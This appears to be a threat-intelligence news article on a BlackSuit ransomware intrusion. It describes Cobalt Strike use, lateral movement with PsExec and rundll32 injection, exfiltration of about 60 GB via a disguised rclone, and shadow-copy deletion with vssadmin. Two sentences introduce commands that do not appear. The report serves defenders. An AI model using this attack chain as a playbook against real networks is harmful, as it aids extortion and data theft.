BlackSuit: New Royal/Conti Rebrand Hits With Speed, Stealth, & Data Exfiltration
Ddos 
A recent Cybereason investigation has shed light on a highly coordinated and destructive ransomware campaign carried out by the BlackSuit ransomware group, a rebranded successor of the notorious Royal and Conti threat actors. This campaign showcases a blend of stealth, speed, and surgical precision—making it one of the most sophisticated ransomware operations seen this year.
“BlackSuit is a ransomware group that emerged in mid-2023, and is widely believed to be a rebrand or spin-off of the Royal ransomware gang,” Cybereason explains in their latest report.
Unlike conventional ransomware attacks that focus solely on encryption, BlackSuit adopts a tri-phase kill chain: initial compromise, data exfiltration, and selective encryption, with the added twist of data deletion to cripple recovery efforts.
The attack begins with Cobalt Strike beacon deployment for command-and-control (C2) and lateral movement. While the initial access vector remains unknown, analysts noted early traffic originated from a device without a Cybereason sensor—suggesting prior compromise.
“Cobalt Strike is observed to be the primary attack tool utilized by BlackSuit ransomware,” the team noted.
To pivot laterally, BlackSuit used a combination of:
- PsExec.exe to distribute and execute payloads like vm.dll and vm80.dll via the C:\Windows\Temp folder
- RPC service creation with System privileges
- Configure-SMRemoting.exe to establish remote desktop connections
- Suspicious binaries like frdke23.exe executed from network shares, injecting code via rundll32.exe into legitimate processes such as wuauclt.exe
These tactics allowed the attackers to maintain stealth while conducting widespread reconnaissance and payload deployment across the network.
The Cobalt Strike beacons were downloaded using PowerShell commands like:
The same C2 infrastructure was used to deploy the final payload—BlackSuit ransomware—through renamed files like b.exe and vmware.dll.
One unusual characteristic was the use of the -nomutex flag during execution:
“Unlike typical ransomware behavior… the -nomutex flag disables mutex creation… enabling multiple concurrent executions — potentially for redundancy, faster encryption across sessions, or to bypass mutex-based detections.”
Before encryption, attackers exfiltrated around 60 GB of sensitive data using a renamed version of rclone.exe (disguised as vmware.exe). This behavior reflects a growing trend in double extortion tactics—where data is stolen before encryption to increase ransom pressure.
To sabotage recovery efforts, the attackers used vssadmin.exe to wipe shadow copies:
This was immediately followed by ransomware execution, targeting only specific file types while excluding system-critical folders like Windows, IPC$, and ADMIN$ to avoid operational disruption.
BlackSuit’s encryption logic is fine-tuned for performance and stealth. The ransomware avoids encrypting .exe, .dll, and .BlackSuit files and drops a ransom note.
Related Posts:
- Researchers Reveal Sophisticated BlackSuit Ransomware Attack
- BlackSuit Affiliates Continue Social Engineering Attacks with Upgraded Java RAT and Cloud Abuse
- Fake Zoom, Real Ransom: Nine-Day Malware Intrusion Ends with BlackSuit Ransomware Blast
- Zerologon Vulnerability Strikes Again: RansomHub Exploits Legacy Flaw
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
